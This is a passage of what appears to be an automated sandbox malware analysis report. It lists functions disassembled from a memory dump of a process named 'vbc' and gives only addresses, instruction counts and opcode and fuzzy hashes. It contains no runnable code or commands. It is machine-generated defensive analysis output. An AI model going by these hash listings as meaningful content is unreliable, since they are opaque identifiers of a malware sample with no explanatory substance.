                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5f8407c30ec268efb2a56889fadbd32fdc26081681ef12d627a1fdb49b92dfce
                                                                                    • Instruction ID: 0d7cad569f7f7d5a02cc47ae4f8fbc62bd7992246419f21720abe5413738972a
                                                                                    • Opcode Fuzzy Hash: 5f8407c30ec268efb2a56889fadbd32fdc26081681ef12d627a1fdb49b92dfce
                                                                                    • Instruction Fuzzy Hash: F4019736210209AFCF129F84DC40EDE3FAAFB4C764F069511FE1966260C636E970EB81
                                                                                    Function 058B656A Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0920ee90354ed3308bf84648a592ba6236293137cc8b68d2eb7dfbdc2084c27a
                                                                                    • Instruction ID: 0524f104d8acca5ad070bafedfa71a42abf5783d1c11480ec22081b4dd6b7be6
                                                                                    • Opcode Fuzzy Hash: 0920ee90354ed3308bf84648a592ba6236293137cc8b68d2eb7dfbdc2084c27a
                                                                                    • Instruction Fuzzy Hash: 7C018170308784DBF722976DCD48F7637A9BB44B04F480595BE12DB6E2FB68DD018211
                                                                                    Function 0587C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ad38fd14cd54bd4314c643fb4cf77916b0d08e7a0723a33d4523a8db6d87ed48
                                                                                    • Instruction ID: fdaf65abdefe448e91a01bc1ed04b34a3f2842505249bbf1c48055f11bf53826
                                                                                    • Opcode Fuzzy Hash: ad38fd14cd54bd4314c643fb4cf77916b0d08e7a0723a33d4523a8db6d87ed48
                                                                                    • Instruction Fuzzy Hash: 29F090723042095BE624A6199C51F3237AAE7C06A5F65807AEF0ACB680FA71DC41C3B5
                                                                                    Function 0592437C Relevance: .0, Instructions: 37COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                    • Instruction ID: 2b6edf620afaaa284ebc61a36b901344b592129171bb5d2d833112a9d44e97da
                                                                                    • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                    • Instruction Fuzzy Hash: AFF0E932385A3287DF36AA29C524B2EA29EFF80E00B05052C984BCB644DF60DC008780
                                                                                    Function 05908D20 Relevance: .0, Instructions: 35COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 17d794143f5a03115469b817eb997d69bc91b9a7c71a358149875159ec7e588c
                                                                                    • Instruction ID: 1dbe33cce5a306f642c863e6ff8bea2a97b28440f2be19331f5cccf7680b0444
                                                                                    • Opcode Fuzzy Hash: 17d794143f5a03115469b817eb997d69bc91b9a7c71a358149875159ec7e588c
                                                                                    • Instruction Fuzzy Hash: D0F05B327143485FD6217A189848B5BBBADFB94720F4A1917FC4567251CA306C82C690
                                                                                    Function 058847FB Relevance: .0, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2b7f22df9692eab7b035e3e4bd97f0aac7360dd79ff96761a633a39587db5d4b
                                                                                    • Instruction ID: 887d62c935b71f4138a0ad27fa5f64cffb6ea11e989bacacec8b8bcf19514faa
                                                                                    • Opcode Fuzzy Hash: 2b7f22df9692eab7b035e3e4bd97f0aac7360dd79ff96761a633a39587db5d4b
                                                                                    • Instruction Fuzzy Hash: E2F06D329166D79EDF22EB588049F317795EB0872CF09496ADC8AC7521C624DC84C651
                                                                                    Function 05940115 Relevance: .0, Instructions: 32COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: afd5e4293c985d8f886288a2e6d35b95a97c2ca2a214a065510769696042f256
                                                                                    • Instruction ID: 398a975111d84bbb50e956995eb78caa7ccbe6eff12a032ba48d15b08984bb99
                                                                                    • Opcode Fuzzy Hash: afd5e4293c985d8f886288a2e6d35b95a97c2ca2a214a065510769696042f256
                                                                                    • Instruction Fuzzy Hash: 63F0276652DB88CACF216B38A69EAA16F69A78A150F091446D5A25F200CA749C83CA24
                                                                                    Function 058BC5ED Relevance: .0, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f60bec51d6f83771867acabeb9431905d142776f09bf44307471220681592112
                                                                                    • Instruction ID: 5b89fd7e91b0c6b4dd37f75869005e6ac164fa6ec91620df4e5126a8325999af
                                                                                    • Opcode Fuzzy Hash: f60bec51d6f83771867acabeb9431905d142776f09bf44307471220681592112
                                                                                    • Instruction Fuzzy Hash: B1F0BE716596529BE722D658C148FA273EDAB826A4F08A469DC06C7712C6A0DC80CA51
                                                                                    Function 058C2619 Relevance: .0, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                    • Instruction ID: fa70030a53f05cc9213ffb19babc2621cb76aa70660924a6dd6ae1ddd58cc5bf
                                                                                    • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                    • Instruction Fuzzy Hash: 1AE09232300A006BD7229E5D8C84F477B6EAF82B10F0400BDB9059E291C9F2DC0982A5
                                                                                    Function 058BCF80 Relevance: .0, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0f2503cf4af7cb7b09027b56ae64a80349c60eadc7eba6a9026732afcc48f9fb
                                                                                    • Instruction ID: f97ba0dfd2d25bcc9b7b5c32bec3f5cf3402d679a9f87bcfccd967cd8135bbb3
                                                                                    • Opcode Fuzzy Hash: 0f2503cf4af7cb7b09027b56ae64a80349c60eadc7eba6a9026732afcc48f9fb
                                                                                    • Instruction Fuzzy Hash: 7BF0823230450AEFEB11AA5AD844EAEFB6AEFC5750F148052FD04CB350DBB1AC61CB51
                                                                                    Function 05916030 Relevance: .0, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                    • Instruction ID: 4e43ceb6a0bd25ae7ab15cf19ee798e1a23661c0cf80ff45d940298fa489979e
                                                                                    • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                    • Instruction Fuzzy Hash: 24F0E572504218DFE3218F1ADC44F62B7EDFB05364F46C029EA098B960D33AEC40CBA8
                                                                                    Function 05880710 Relevance: .0, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                    • Instruction ID: ca9ee8ac02876402acf9fe0c5107862d760f36f3a4ce555b24442115001823eb
                                                                                    • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                    • Instruction Fuzzy Hash: 8EF0E53A304B45DBEB15EF15C058AB57BE9FB81350B054454EC46CB300DB32ED85CB90
                                                                                    Function 0587EC20 Relevance: .0, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 996ac50646acec401b5b4ec6e6a79d216cdcf7e2fbd334b6c0b4cd53c06c704f
                                                                                    • Instruction ID: df7da6a294bcf2170e9f8dc51c629a255562e782cbd6a761fdcf0ed7f4364c86
                                                                                    • Opcode Fuzzy Hash: 996ac50646acec401b5b4ec6e6a79d216cdcf7e2fbd334b6c0b4cd53c06c704f
                                                                                    • Instruction Fuzzy Hash: CAF0A03922428CAFEF18CB14C408F2537ADBB90324F2484A9FC08CA152C774DCA4CB05
                                                                                    Function 0592678E Relevance: .0, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                    • Instruction ID: ae9bdb1410113117952f4c472cc1d8f6f53f4eb6af03e63267b112c34f9c3c19
                                                                                    • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                    • Instruction Fuzzy Hash: D4E0DF32B00224BBDF329799CD05F9ABABCEB80EA0F090064BA01E71A4D970DE00C690
                                                                                    Function 058B8EF5 Relevance: .0, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 65bd58f9c81ef7dc9deb4ad34950b4452d042e311a989e293ef9dffccbb7ce66
                                                                                    • Instruction ID: db372c4672eeadc758ac49ed4fe7622eb7742cc24cea5b12f234107fd67248e9
                                                                                    • Opcode Fuzzy Hash: 65bd58f9c81ef7dc9deb4ad34950b4452d042e311a989e293ef9dffccbb7ce66
                                                                                    • Instruction Fuzzy Hash: 5FE06D3466E1584BEE224F60A6157E83B9FBB01A91B49109AFC45DB702CA989C02AE40
                                                                                    Function 058825E0 Relevance: .0, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 21e112aff8d712825dc515be148625baeb305007ec2d268a071df4b83b1d06c3
                                                                                    • Instruction ID: 2714fa4e5eb00bad53d8883855dc9a0149a6cc4abe283e665c37bdc46dc38fe3
                                                                                    • Opcode Fuzzy Hash: 21e112aff8d712825dc515be148625baeb305007ec2d268a071df4b83b1d06c3
                                                                                    • Instruction Fuzzy Hash: CBE09272200A549BC725FB2DDD05F9A7B9AEF50364F114519B556971A0CB30AD10C7C9
                                                                                    Function 0593A456 Relevance: .0, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                    • Instruction ID: a39bdf1d96dd430f9a9d3d1053414d389f83826b55cd445703ee39e0e7c470fe
                                                                                    • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                    • Instruction Fuzzy Hash: 49E06D31110B10DFE7366B29C90CB52B6A9BF40711F148C2CA0DB414B0C7B59C80CA41
                                                                                    Function 05904000 Relevance: .0, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                    • Instruction ID: fd64f25af3b779b0f27d5d23c6bc76f8185ed1630762b495345650cf7503bcbf
                                                                                    • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                    • Instruction Fuzzy Hash: CBE0C2343043068FDB15CF19C040B6377BABFD5A10F28C468A9498F245EB32E842CB40
                                                                                    Function 0587823B Relevance: .0, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                    • Instruction ID: 815cb58abdedfb1596e0b2946cd72f4ffc4ff44496d70f8f3b24813d101227cf
                                                                                    • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                    • Instruction Fuzzy Hash: 6BE08631210A18DEDB316E19DC08F517AA2FF44B52F114869E886854A4CA70DC81CE55
                                                                                    Function 05878C8D Relevance: .0, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                    • Instruction ID: 2d1cb47deb9296c4a1e6c06ada519edc90ab751ac25ed84271325fdc922d4f54
                                                                                    • Opcode Fuzzy Hash: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                    • Instruction Fuzzy Hash: 4AE08631101B28DEDB316F1ADD0CF527AA2BB80715F114869B847D54A0CA70DC85DE96
                                                                                    Function 05882050 Relevance: .0, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 636b35ca1a6578eb23c7da864d642550ce65785ef30bb6a55af3ef6cd7489af6
                                                                                    • Instruction ID: b2b46b9538748e038e5605b649329f88fc8c6e3a1e6af24d04d868c883d9e392
                                                                                    • Opcode Fuzzy Hash: 636b35ca1a6578eb23c7da864d642550ce65785ef30bb6a55af3ef6cd7489af6
                                                                                    • Instruction Fuzzy Hash: 88E0C233200A54ABC711FB5DDD01F5A779EEF94360F140121F955C72A0CB20AD00C7D9
                                                                                    Function 05936ED0 Relevance: .0, Instructions: 17COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
                                                                                    • Instruction ID: 15b67c747e7b061ef38a6f3114906a1cc95fd704e4488b557adb0ef8663ddae5
                                                                                    • Opcode Fuzzy Hash: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
                                                                                    • Instruction Fuzzy Hash: 4AD05E2910C2C4E7DB32899DC0627B67F1F9743E14F29607CD5960FA02DA1758AFE62A
                                                                                    Function 058BE59C Relevance: .0, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                    • Instruction ID: 0123e6d204bf153feccf885e3de943de0311bf477e580323854b07e877186fcc
                                                                                    • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                    • Instruction Fuzzy Hash: B4D0A932204A20ABDB32AA1CFC04FD333E9BB88720F1A0859F418C7050C760AC81CA84
                                                                                    Function 0587A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                    • Instruction ID: e6882d4e27969130f63db5ff0f7da33694ac0c676b3c4f6ec59d7edcede5b3b9
                                                                                    • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                    • Instruction Fuzzy Hash: D7D0123231747497DF2DA6556954F6B7A16AB81A98F1A046D7C0BD3900C515CC43D6E0
                                                                                    Function 058BCF50 Relevance: .0, Instructions: 14COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 72e3af983ebc66d3956c14ac95f5d8b1f66f3ddd68541da8a3edefc2d74baea6
                                                                                    • Instruction ID: 185c9c3511500d00dcf5e223484aa8f3555f25eb8691afcb8c8b71a4daca5ef4
                                                                                    • Opcode Fuzzy Hash: 72e3af983ebc66d3956c14ac95f5d8b1f66f3ddd68541da8a3edefc2d74baea6
                                                                                    • Instruction Fuzzy Hash: 79D0A932210648ABCB02FF0CCD41F163FAAEBA8740F040020B808C7222CA30ED60CA88
                                                                                    Function 058902A0 Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                    • Instruction ID: f6b668ee7ca52066eafa90440fe225e71659925b6420e1540d8c63d2e4f9a3c8
                                                                                    • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                    • Instruction Fuzzy Hash: F7D09235216A80CFCA1BCB48C5A8B1573A4BB85B44F850490E802CBB61D628ED80CA00
                                                                                    Function 058BCF1F Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0844155f6a0014c5bd75be9d44783c23dc3fdfb445a04ebbfa09be91e4192d6c
                                                                                    • Instruction ID: 3c65caab6f614c92c187b0956e65333f29d9b49a7a469315dcea8e2ef26b91bd
                                                                                    • Opcode Fuzzy Hash: 0844155f6a0014c5bd75be9d44783c23dc3fdfb445a04ebbfa09be91e4192d6c
                                                                                    • Instruction Fuzzy Hash: 11D05E72121941DFEB2ACB08C946F6577A4F700704F4940B8A00ACBA20C768ED04DB84
                                                                                    Function 058BC700 Relevance: .0, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                    • Instruction ID: cb7da24df23d9f5d3fef850f975309ae70be4cb9d2592a3b85df86a00e1d33b7
                                                                                    • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                    • Instruction Fuzzy Hash: 7BC01232250644AFC7159A98CD01F0177A9E798B40F140421F60487570C531EC10D684
                                                                                    Function 058A0310 Relevance: .0, Instructions: 11COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                    • Instruction ID: 0e06401958ff51072e298bad110e6f52895aa9e50bfcdcbcb7d660253cc80257
                                                                                    • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                    • Instruction Fuzzy Hash: FED01237200248EFCB01DF45C894D9A772AFBC8710F108019FD19076108A31ED62DA51
                                                                                    Function 05880750 Relevance: .0, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                    • Instruction ID: 37b29ac0550f797059d4f1bc70e08bc0e648505c17a3e065d064b8bc9d8cfa3a
                                                                                    • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                    • Instruction Fuzzy Hash: 38C04C75751A458FCF15DB19D294F5577E4F744740F150890EC05DB721E624EC01CA11
                                                                                    Function 05936F00 Relevance: .0, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                    • Instruction ID: 344557a4303dee7c8b45cdf719f35ee63b90aadf40b7b5e89c24882a40a3c467
